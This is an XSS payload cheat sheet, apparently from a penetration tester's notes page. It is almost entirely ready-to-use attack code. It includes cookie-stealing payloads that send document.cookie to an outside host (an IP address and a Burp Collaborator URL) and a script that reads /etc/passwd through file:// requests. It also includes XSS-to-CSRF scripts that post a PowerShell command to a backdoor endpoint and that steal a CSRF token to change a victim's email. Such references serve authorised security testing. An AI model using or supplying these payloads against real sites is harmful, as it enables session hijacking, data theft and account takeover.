XSS
Cross-Site Scripting
Ultimate checker: '"/><script>print()</script>.

Redirections

<head>
<meta http-equiv="refresh" content="0; URL=http://www.example.com/" />
</head>

Data Grabbers

Cookies

Img tag:
<img src="x" onerror="this.src='http://10.10.15.123/?c='+btoa(document.cookie)">
Fetch:
<script>
fetch('https://<SESSION>.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body: document.cookie
});
</script>

XMLHttpRequest

XSS to LFI

<script>
var xhr = new XMLHttpRequest;
xhr.onload = function() {
document.write(this.responseText);
};
xhr.open("GET", "file:///etc/passwd");
xhr.send();
</script>
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText);};x.open("GET","file:///etc/passwd");x.send();</script>

XSS to CSRF

If the endpoint is accessible only from localhost:
<script>
var xhr;
if (window.XMLHttpRequest) {
xhr = new XMLHttpRequest();
} else {
xhr = new ActiveXObject("Microsoft.XMLHTTP");
}
xhr.open("POST", "/backdoor.php");
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.send("cmd=powershell -enc ...");
</script>
With capturing CSRF token first:
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('GET', '/email', true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('POST', '/email/change-email', true);
changeReq.send('csrf='+token+'&[email protected]')
};
</script>
Copy link
On this page
Redirections
Data Grabbers
Cookies
XMLHttpRequest
XSS to LFI
XSS to CSRF